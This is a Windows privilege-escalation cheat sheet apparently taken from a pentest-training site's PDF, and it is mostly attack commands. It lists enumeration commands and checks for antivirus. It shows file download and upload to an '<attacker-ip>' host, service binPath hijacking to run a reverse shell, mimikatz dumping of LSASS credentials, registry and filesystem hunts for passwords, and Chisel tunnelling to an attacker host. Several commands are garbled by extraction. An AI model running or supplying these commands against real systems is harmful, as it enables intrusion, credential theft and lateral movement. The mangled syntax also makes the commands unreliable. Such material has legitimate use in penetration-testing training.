? Windows Privilege Escalation Cheat Sheet – From User to Admin! ?? ? Master Enumeration, Service Exploits & Credential Dumping! ⚡ ? Learn Registry Exploitation, Misconfigured Services & Automated Tools! ? ? Use WinPEAS, PowerUp & Mimikatz for Advanced Privilege Escalation! ? ? Essential for Ethical Hackers, Pentesters & Red Teamers! ?️ ? Enhance Your Windows Privilege Escalation Skills!
Trang 1Windows Privilege Escalation
Cheatsheet 🚀-Hacklivly.com
Privilege escalation is a critical phase in penetration testing and Windows
post-exploitation Once an attacker gains a foothold on a machine, escalating
privileges to Administrator or SYSTEM can unlock deeper access and lateral
movement across the network This cheatsheet provides a
structured step-by-step guide to enumeration, exploiting misconfigurations, credentials
dumping, service abuse, registry exploitation, and more!
Letʼs escalate to SYSTEM!
—
General Enumeration - Who Am I?
Basic User Information
whoami /all
echo %USERNAME%
whoami /groups
Do I Have Anything Fun? (Privileges Check)
whoami /priv
net user <username>
Look for SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, etc 🚨
Trang 2 Where Am I? (System Info)
systeminfo
hostname
Look for hotfixes, outdated versions, and patch levels!
—
Anyone Home? (Users & Groups)
net users
net localgroup administrators
Check Logged-In Users
query user
—
What Am I Part Of? (Domain
Enumeration)
whoami /groups
net group "Domain Admins" /domain
—
What Is This Place? (System &
Installed Software Info)
wmic product get name,version,vendor
Trang 3Look for outdated software for exploits.
—
Is It Fancy? (Checking System
Integrity)
systeminfo | findstr /B /C"OS Name" /C"OS Version"
Look for Windows version for kernel exploits.
—
Am I Tied Up? (Restrictions & Policies)
gpresult /z
Look for GPO restrictions that may prevent actions.
—
Anything Reachable? (Network Info &
Open Ports)
ipconfig /all
netstat -ano
Check for open ports, firewall rules, or RDP access.
—
What Does The Inside Look Like?
(Processes & Services)
tasklist /v
wmic service get name,displayname,pathname,startmode
Trang 4Look for misconfigured services and exploitable binaries.
—
🔟 Leave Me Alone! (Defender & AV
Checks)
sc query windefend
wmic /namespace:\\root\securitycenter2 path antivirusproduct get display
Name
Look for Windows Defender or AV software that might block your attacks.
—
🛠 Exploitation Techniques 🚀
🔹 File Transfer - Upload/Download Files
Using SMB
copy file.exe \\<attacker-ip>\share
Using PowerShell
New-Object System.Net.WebClient).DownloadFile("http://<attacker-ip>/fil
e.exe", "C\Users\Public\file.exe")
—
🔹 Automated Enumeration - WinPEAS &
More
WinPEAS (Privilege Escalation Automated Scanner)
Trang 5PowerUp - Automated PrivEsc Finder
Import-Module \PowerUp.ps1
Invoke-AllChecks
—
🔹 Hacking the Services (Service
Misconfiguration)
Checking Access using Accesschk.exe
accesschk.exe -uwcqv "Authenticated Users" *
Getting ACLs
icacls "C\Program Files\VulnerableService"
Exploiting Services - sc.exe
sc config ServiceName> binPath= "C\Attack\reverse-shell.exe"
sc start ServiceName>
—
🔹 Registry Exploitation (Stored
Passwords & Secrets)
Finding Credentials in Registry
reg query HKLM /f password /t REG_SZ /s
Trang 6🔹 Credentials or Hashes (Extracting &
Using Credentials)
Extracting Credentials from LSASS
mimikatz.exe
sekurlsa::logonpasswords
RunAs - Running Programs as Another User
runas /user:Administrator cmd.exe
—
🔹 Find Files Fast (Hunting for Sensitive
Files)
dir /s /b *password*.*
—
🔹 Port Forwarding (Pivoting & Lateral
Movement)
Using Chisel
chisel client <attacker-ip>:8080 R9999127.0.0.13389
Use it to tunnel RDP, SSH, or SMB through firewalls.
—
Trang 7🔥 Final Thoughts
Mastering Windows Privilege Escalation requires practice Focus
on enumeration, misconfigurations, credentials, services, registry, and
network pivoting.
🚀 “Try Harderˮ and Hack Like a Pro!